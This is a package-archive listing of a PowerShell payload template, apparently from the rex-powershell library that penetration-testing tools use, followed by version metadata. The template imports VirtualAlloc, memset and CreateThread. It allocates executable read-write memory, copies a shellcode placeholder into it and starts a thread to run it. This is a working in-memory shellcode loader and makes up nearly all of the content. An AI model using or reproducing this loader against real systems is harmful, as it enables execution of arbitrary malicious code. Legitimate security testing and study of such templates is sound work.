Sha256: e60a0190d058ecac60cb205627fc79f9f878c2083f57a6bf1e86dccdcafe63ff

Contents?: true

Size: 948 Bytes

Versions: 6

Compression:

Stored size: 948 Bytes

Contents

$%{var_syscode} = @"
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("msvcrt.dll")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);
"@

$%{var_win32_func} = Add-Type -memberDefinition $%{var_syscode} -Name "Win32" -namespace Win32Functions -passthru

%{shellcode}

$%{var_rwx} = $%{var_win32_func}::VirtualAlloc(0,[Math]::Max($%{var_code}.Length,0x1000),0x3000,0x40)

for ($%{var_iter}=0;$%{var_iter} -le ($%{var_code}.Length-1);$%{var_iter}++) {
  $%{var_win32_func}::memset([IntPtr]($%{var_rwx}.ToInt32()+$%{var_iter}), $%{var_code}[$%{var_iter}], 1) | Out-Null
}

$%{var_win32_func}::CreateThread(0,0,$%{var_rwx},0,0,0)

Version data entries

6 entries across 6 versions & 1 rubygems

Version Path
rex-powershell-0.1.70 data/templates/to_mem_old.ps1.template
rex-powershell-0.1.69 data/templates/to_mem_old.ps1.template
rex-powershell-0.1.68 data/templates/to_mem_old.ps1.template
rex-powershell-0.1.67 data/templates/to_mem_old.ps1.template
rex-powershell-0.1.66 data/templates/to_mem_old.ps1.template
rex-powershell-0.1.65 data/templates/to_mem_old.ps1.template